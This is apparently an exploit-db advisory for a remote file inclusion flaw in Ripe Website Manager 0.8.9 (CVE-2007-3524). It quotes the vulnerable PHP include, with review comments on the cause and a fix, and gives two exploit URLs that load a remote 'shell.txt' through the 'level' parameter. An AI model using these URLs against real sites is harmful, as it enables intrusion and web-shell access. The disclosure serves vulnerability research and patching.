Ripe Website Manager (CMS) 0.8.9 - Remote File Inclusion
Author: BlackNDoor
type: webapps
platform: php
port:
date_added: 2007-06-29
date_updated: 2016-10-05
verified: 1
codes: OSVDB-37800;CVE-2007-3524;OSVDB-37799
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comRipe_v0.8.9.zip
#Author:: BlackNDoor | blackndoor@learntohell.net
#Homepage:: www.learntohell.net
#
#Script:: Ripe Website Manager
#Version:: <= v0.8.9
#Type:: Remote File Include
#
#Source:: http://sourceforge.net/project/showfiles.php?group_id=194532
#Bug::
-> Files:
/admin/includes/author_panel_header.php
/admin/includes/admin_header.php
-> vulncode:
<?php
...
// $level is not assigned anywhere in this excerpt. The request URLs in this advisory
// pass `level` as a query-string parameter, so the value presumably reaches this
// variable through register_globals or a similar import of request variables
// (confirm against the full file).
define("LEVEL", $level); // directory level
// includes
// LEVEL forms the leading part of the require() path and no validation is visible
// before this line, so whoever controls $level controls where the included path begins.
// NOTE(review): whether a remote URL is accepted here depends on the PHP configuration
// (allow_url_fopen / allow_url_include). Local path manipulation remains possible either way.
// NOTE(review): the fix is to derive LEVEL from a fixed, server-side value (e.g. relative
// to __FILE__) and to refuse direct HTTP requests to files under /admin/includes/.
require(LEVEL.'../includes/config.php');
...
?>
#Exploit::
http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt?
http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt?
#thanks:: str0ke
# milw0rm.com [2007-06-30]